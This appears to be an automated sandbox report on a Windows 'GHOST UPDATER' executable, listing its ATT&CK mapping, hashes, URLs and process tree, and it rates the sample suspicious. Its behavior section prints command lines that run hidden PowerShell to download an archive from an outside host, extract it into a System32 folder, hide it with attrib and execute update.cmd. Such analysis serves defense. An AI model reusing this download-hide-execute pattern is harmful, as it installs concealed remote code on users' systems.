Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\toolbox.updater.x64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | PowerShell1 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion3 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Process Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
Behavior Graph (ID: 323322, Sample: toolbox.updater.x64.exe, Start date: 26/11/2020, Architecture: WINDOWS, Score: 26): toolbox.updater.x64.exe started, flagged with the signature "Suspicious powershell command line found"; it started three powershell.exe instances and 3 other processes; powershell.exe started conhost.exe.

Source | Detection | Scanner | Label
toolbox.updater.x64.exe | 6% | Virustotal |
toolbox.updater.x64.exe | 0% | Metadefender |
toolbox.updater.x64.exe | 0% | ReversingLabs |
No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5sProgramFil | 0% | Avira URL Cloud | safe
https://go.micro | 0% | URL Reputation | safe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zkA | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://go.microsoft.co& | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0y2 | 0% | Avira URL Cloud | safe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z | 0% | Avira URL Cloud | safe
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5 | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmp | false | | high
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5sProgramFil | powershell.exe, 00000002.00000002.666889217.00000282B7120000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000006.00000002.714170115.00000252A2BA3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7zkA | powershell.exe, 00000002.00000002.666633430.00000282B6FD6000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://go.microsoft.co& | powershell.exe, 00000002.00000002.668658456.00000282B8F04000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://contoso.com/Icon | powershell.exe, 00000006.00000002.714485528.00000252B1343000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z0y2 | powershell.exe, 00000002.00000002.669629568.00000282B9248000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z | powershell.exe, 00000002.00000002.666506406.00000282B6F50000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z-t5 | powershell.exe, 00000002.00000002.667108518.00000282B89F0000.00000004.00000040.sdmp, powershell.exe, 00000002.00000002.668443505.00000282B8E80000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | toolbox.updater.x64.exe, 00000000.00000002.694354112.0000000002531000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.669043918.00000282B9041000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.679992499.000001E580001000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.706675027.00000252A12E1000.00000004.00000001.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.707252029.00000252A1645000.00000004.00000001.sdmp | false | | high
            No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323322
Start date: 26.11.2020
Start time: 18:54:01
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 25s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: toolbox.updater.x64.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: SUS
Classification: sus26.winEXE@13/11@0/0
EGA Information:
• Successful, ratio: 25%
HDC Information:
• Successful, ratio: 3.2% (good quality ratio 2.3%)
• Quality average: 59%
• Quality standard deviation: 40.4%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 29
• Number of non-executed functions: 1
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Execution Graph export aborted for target powershell.exe, PID 496 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6136 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6728 because it is empty
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time | Type | Description
18:55:11 | API Interceptor | 34x Sleep call for process: powershell.exe modified
            No context
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\toolbox.updater.x64.exe.log
Process: C:\Users\user\Desktop\toolbox.updater.x64.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4254
Entropy (8bit): 5.363392037456809
Encrypted: false
SSDEEP: 96:iqnwmI0qerYqGgAo3+aJtIz6cxBAmRvBIQYrjVxmc5qCqKP5t2qBtzG1Cqs:iqnwmI0qerYqGDeIz6rjjqCqKRt2qBt1
MD5: C982F749A7FBDF386134C19F3F07B51A
SHA1: F29DEE052717A2E9B5C8365E81E37078F49743D5
SHA-256: 0123BBE65B5BD9148978971D0B95CAF5792E017C3F532929FA40309A718E5FDE
SHA-512: 95E008DC02E07B2C03E81326A6014B4DAACF3A76AC0D83B3302763C0C625E0AAC154B7BBD3202C2E281F681DD68E6E0A08FD4554B66B10CF8540F7148D715592
Malicious: false
Reputation: low
            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1108
Entropy (8bit): 5.24868687277073
Encrypted: false
SSDEEP: 24:3Y5sPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKEbC:o5sPerB4nqRL/HvFe9t4Cv94zO
MD5: 839575D4F6EC7D87C96D556B27AB8F8F
SHA1: 7F44FAB4E52AFFB4AAAC249EF49149FC0126164F
SHA-256: 729A8D99A55144AC1BAC3E6B00F1451A9784FD23C7C0AEDC8F8F2BADFE5CA0E1
SHA-512: 4DB227AE77A13554ED0ED0B0D28F3000A7D99372F35F1513BC00D50CE03E03098E14B0E5D12EF01DB4F30DFBCA50A4359857B6606616B2DAF510D99DC5C40CDD
Malicious: false
Reputation: low
            Preview: @...e...................................#.......................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14cfabvt.t1e.psm1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c13xbjkz.ite.psm1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnckztsr.jym.psm1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf35m2r4.rts.ps1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnik53oy.1ts.ps1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdcsclge.euw.ps1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

C:\Users\user\Documents\20201126\PowerShell_transcript.142233.tkFHzEDB.20201126185510.txt
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 3803
Entropy (8bit): 5.339773847554602
Encrypted: false
SSDEEP: 96:BZkj/N9qDo1ZSZ1j/N9qDo1ZKHvg0F0r0hZs:wvg0F0r0A
MD5: DD52FCEACC7BCA9E44C17A40D0BAEF72
SHA1: 1CBD56063F770FC9CA2DCAEC24064AE0BC4F8B67
SHA-256: 80007EDA24FCFCD5556837CBC0E9ECF8053E436C5A6229EEBA7C67B240690594
SHA-512: DF2D1F810AC304B762DCBA4EE906291939643E0098A2DA4A5D7E749CFFC5A58DE6B8D65A7DAB38ABC05A986CDD030AEC34FEEE638B85056F734E21CF78463FBD
Malicious: false
            Preview: .**********************..Windows PowerShell transcript start..Start time: 20201126185510..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 142233 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\wbem\en-US\update.cmd..Process ID: 6728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201126185510..**********************..PS>C:\Windows\System32\wbem\en-US\update.cmd..**********************..Windows PowerShell transcript start..Start time: 20201126185511..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 142233 (Microsoft Windows NT 10.0.1713

Static File Info

General

File type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.604636793485997
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: toolbox.updater.x64.exe
File size: 324096
MD5: bde4351613c5ebf5c4b30729ab50acd0
SHA1: 13ebbf56e7d93482712dcd4c6b6866a40e5560db
SHA256: 0cf73f9d6f6ca82b35c79ea947026f3f1c87d6dc12bf6591357ba417fdebe3df
SHA512: 59b7c854870d64ccc4b06846cc7cd9e09cd6e1e17d597b925e7185ec42bde4512cfe6024ca3ca8a919131fd0e7cfd35dd4cb96982772c7d7ce74f89250a6df25
SSDEEP: 3072:RUhDEEaDmTeTfJ62RJCQIWH77Qz1Ug8KI1N3jO6TpPI3P:24PfFJJP+b0XTOP
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....L.^.........."......v...z........... ....@...... ....................... ............@................................

File Icon

Icon Hash: 70e8e6fe9afcf811

General

Entrypoint: 0x400000
Entrypoint Section:
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5E014C99 [Mon Dec 23 23:24:09 2019 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash:

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x378fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x175a0 | 0x17600 | False | 0.423138786765 | data | 6.05201800015 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x1a000 | 0x378fc | 0x37a00 | False | 0.298951018258 | data | 5.05375331113 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x1a358 | 0x5156 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x1f4b0 | 0x267e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x21b30 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x32358 | 0x94a8 | data | English | United States
RT_ICON | 0x3b800 | 0x5488 | data | English | United States
RT_ICON | 0x40c88 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4043309055, next used block 4294967055 | English | United States
RT_ICON | 0x44eb0 | 0x25a8 | data | English | United States
RT_ICON | 0x47458 | 0x10a8 | data | English | United States
RT_ICON | 0x48500 | 0x988 | data | English | United States
RT_ICON | 0x48e88 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_RCDATA | 0x492f0 | 0x1474 | data | |
RT_RCDATA | 0x4a764 | 0x6723 | data | |
RT_GROUP_ICON | 0x50e88 | 0x92 | data | English | United States
RT_VERSION | 0x50f1c | 0x330 | data | |
RT_MANIFEST | 0x5124c | 0x6af | XML 1.0 document, ASCII text, with CRLF line terminators | |

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright (c) 2020 All rights reserved
Assembly Version | 5.0.34.0
InternalName |
FileVersion | 1.8.36.24
CompanyName | GHOST SPECTRE
Comments |
ProductName | GHOST UPDATER
ProductVersion | 1.8.36.24
FileDescription | GHOST SPECTRE
OriginalFilename | GHOST UPDATER

Language of compilation system | Country where language is spoken
English | United States

            Network Behavior

            No network behavior found

            Code Manipulations

            Statistics

            CPU Usage


            Memory Usage


            High Level Behavior Distribution

            • File
            • Registry


            Behavior


            System Behavior

            Start time: 18:54:49
            Start date: 26/11/2020
            Path: C:\Users\user\Desktop\toolbox.updater.x64.exe
            Wow64 process (32bit): false
            Commandline: 'C:\Users\user\Desktop\toolbox.updater.x64.exe'
            Imagebase: 0xa0000
            File size: 324096 bytes
            MD5 hash: BDE4351613C5EBF5C4B30729AB50ACD0
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: .Net C# or VB.NET
            Reputation: low

            Start time: 18:54:54
            Start date: 26/11/2020
            Path: C:\Windows\System32\conhost.exe
            Wow64 process (32bit): false
            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase: 0x7ff724c50000
            File size: 625664 bytes
            MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Reputation: high

            Start time: 18:54:54
            Start date: 26/11/2020
            Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit): false
            Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\wget -q --show-progress --progress=dot --backups=1 http://xcazy.the-ninja.jp/update/2020/x64/ghost.toolbox.7z -t 5
            Imagebase: 0x7ff7bedd0000
            File size: 447488 bytes
            MD5 hash: 95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: .Net C# or VB.NET
            Reputation: high

            Start time: 18:55:01
            Start date: 26/11/2020
            Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit): false
            Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -WindowStyle Hidden wget\7z1900-extra\x64\7za x ghost.toolbox.7z -aoa -pxxxxxxxx -oC:\Windows\System32\wbem\en-US
            Imagebase: 0x7ff7bedd0000
            File size: 447488 bytes
            MD5 hash: 95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: .Net C# or VB.NET
            Reputation: high

            Start time: 18:55:08
            Start date: 26/11/2020
            Path: C:\Windows\System32\attrib.exe
            Wow64 process (32bit): false
            Commandline: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US\update.cmd
            Imagebase: 0x7ff6b9a80000
            File size: 21504 bytes
            MD5 hash: FDC601145CD289C6FBC96D3F805F3CD7
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Reputation: moderate

            Start time: 18:55:08
            Start date: 26/11/2020
            Path: C:\Windows\System32\attrib.exe
            Wow64 process (32bit): false
            Commandline: 'C:\Windows\system32\attrib.exe' +S +H +R C:\Windows\System32\wbem\en-US
            Imagebase: 0x7ff6b9a80000
            File size: 21504 bytes
            MD5 hash: FDC601145CD289C6FBC96D3F805F3CD7
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: C, C++ or other language
            Reputation: moderate

            Start time: 18:55:09
            Start date: 26/11/2020
            Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit): false
            Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' C:\Windows\System32\wbem\en-US\update.cmd
            Imagebase: 0x7ff7bedd0000
            File size: 447488 bytes
            MD5 hash: 95000560239032BC68B4C2FDFCDEF913
            Has elevated privileges: true
            Has administrator privileges: true
            Programmed in: .Net C# or VB.NET
            Reputation: high

            Disassembly

            Code Analysis

            Execution Graph

            Execution Coverage:16.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:57.1%
            Total number of Nodes:7
            Total number of Limit Nodes:2

            Graph

            Execution graph (rendered graph not recoverable; nodes as extracted): 7ffa35ba59a4 -> 7ffa35ba59d8 -> 7ffa35ba0260 -> 7ffa35ba0269 (WNetGetConnectionW) -> 7ffa35ba4608 -> 7ffa35ba6477; 7ffa35ba59a4 and 7ffa35ba59d8 also branch to 7ffa35ba64bb.

            Executed Functions

            Control-flow Graph

            Control-flow graph of the function at 7ffa35ba24d0 (legend: Executed / Not Executed; rendered graph not recoverable, basic-block edge list not reproduced).
